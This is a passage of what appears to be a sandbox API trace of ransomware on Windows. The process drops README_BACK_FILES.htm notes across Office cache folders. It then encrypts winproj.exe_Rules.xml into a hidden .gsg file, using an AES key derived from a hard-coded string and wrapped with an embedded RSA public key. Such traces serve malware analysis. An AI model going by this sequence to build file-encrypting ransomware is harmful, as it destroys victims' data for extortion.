(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\cdn.odc.officeapps.live.com\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\cdn.odc.officeapps.live.com\\readme_back_files.htm")) returned 0xffffffff [0269.636] AreFileApisANSI () returned 1 [0269.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2eb96c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 134 [0269.636] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\cdn.odc.officeapps.live.com\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\cdn.odc.officeapps.live.com\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0269.639] GetFileType (hFile=0x5d4c) returned 0x1 [0269.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0269.642] FindNextFileA (in: hFindFile=0x2fa1c8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0269.642] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\clienttemplates.content.office.net\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2fa5c8 [0269.645] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.658] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.659] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.660] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.660] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.660] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.660] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.660] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.660] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.660] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.662] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.663] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.663] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.663] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.663] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.663] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.663] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.663] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.663] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.663] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.663] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.663] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.664] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.664] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.664] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.664] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.664] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.664] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.664] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.664] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.664] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.664] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.664] FindNextFileA (in: hFindFile=0x2fa5c8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0269.664] FindClose (in: hFindFile=0x2fa5c8 | out: hFindFile=0x2fa5c8) returned 1 [0269.666] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\clienttemplates.content.office.net\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\clienttemplates.content.office.net\\readme_back_files.htm")) returned 0xffffffff [0269.666] AreFileApisANSI () returned 1 [0269.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2eb9468, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0269.667] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\clienttemplates.content.office.net\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\clienttemplates.content.office.net\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0269.670] GetFileType (hFile=0x5d4c) returned 0x1 [0269.670] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0269.672] FindNextFileA (in: hFindFile=0x2fa1c8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0269.672] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2fa788 [0269.673] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.673] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.673] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.674] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.674] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.674] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.674] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0269.674] FindClose (in: hFindFile=0x2fa788 | out: hFindFile=0x2fa788) returned 1 [0269.675] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\officeclient.microsoft.com\\readme_back_files.htm")) returned 0xffffffff [0269.675] AreFileApisANSI () returned 1 [0269.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2eb96c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 133 [0269.676] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\officeclient.microsoft.com\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0269.678] GetFileType (hFile=0x5d4c) returned 0x1 [0269.679] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0269.682] FindNextFileA (in: hFindFile=0x2fa1c8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0269.682] FindClose (in: hFindFile=0x2fa1c8 | out: hFindFile=0x2fa1c8) returned 1 [0269.682] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\readme_back_files.htm")) returned 0xffffffff [0269.682] AreFileApisANSI () returned 1 [0269.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2aa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0269.682] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0269.684] GetFileType (hFile=0x5d3c) returned 0x1 [0269.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0269.685] FindNextFileA (in: hFindFile=0x2fa908, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0269.685] FindClose (in: hFindFile=0x2fa908 | out: hFindFile=0x2fa908) returned 1 [0269.685] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\readme_back_files.htm")) returned 0xffffffff [0269.685] AreFileApisANSI () returned 1 [0269.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0269.686] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.688] GetFileType (hFile=0x5d48) returned 0x1 [0269.688] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0269.690] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0269.690] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\Wef\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa448 [0269.691] FindNextFileA (in: hFindFile=0x2fa448, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0269.691] FindNextFileA (in: hFindFile=0x2fa448, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0269.691] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\Wef\\AppCommands\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2fa4c8 [0269.692] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0269.692] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0269.692] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0269.693] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\Wef\\AppCommands\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\wef\\appcommands\\readme_back_files.htm")) returned 0xffffffff [0269.693] AreFileApisANSI () returned 1 [0269.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0269.693] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\Wef\\AppCommands\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\wef\\appcommands\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0269.695] GetFileType (hFile=0x5d3c) returned 0x1 [0269.695] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0269.697] FindNextFileA (in: hFindFile=0x2fa448, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0269.697] FindClose (in: hFindFile=0x2fa448 | out: hFindFile=0x2fa448) returned 1 [0269.697] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\Wef\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\wef\\readme_back_files.htm")) returned 0xffffffff [0269.697] AreFileApisANSI () returned 1 [0269.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0269.697] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\Wef\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\wef\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.698] GetFileType (hFile=0x5d48) returned 0x1 [0269.698] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0269.700] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0269.700] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0269.700] GetLastError () returned 0x0 [0269.700] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winproj.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winproj.exe_rules.xml")) returned 0x20 [0269.701] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winproj.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0269.701] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winproj.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winproj.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.702] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winproj.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winproj.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0269.704] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winproj.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0269.704] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0269.706] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0269.706] lstrlenA (lpString="yzLScEfviKODKVbxMUZoAxYXzMlQm") returned 29 [0269.706] CryptHashData (hHash=0x2fa5c8, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0269.706] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa5c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa6c8) returned 1 [0269.707] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0269.707] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0269.707] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f27000) returned 1 [0269.707] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27000, dwCertEncodingType=0x1, pInfo=0x2f2fc60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f2fc90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f2fc98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa888) returned 1 [0269.707] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0269.707] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27088*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f27088*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0269.708] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f27088*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f27088*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0269.709] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.722] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.722] WriteFile (in: hFile=0x5d3c, 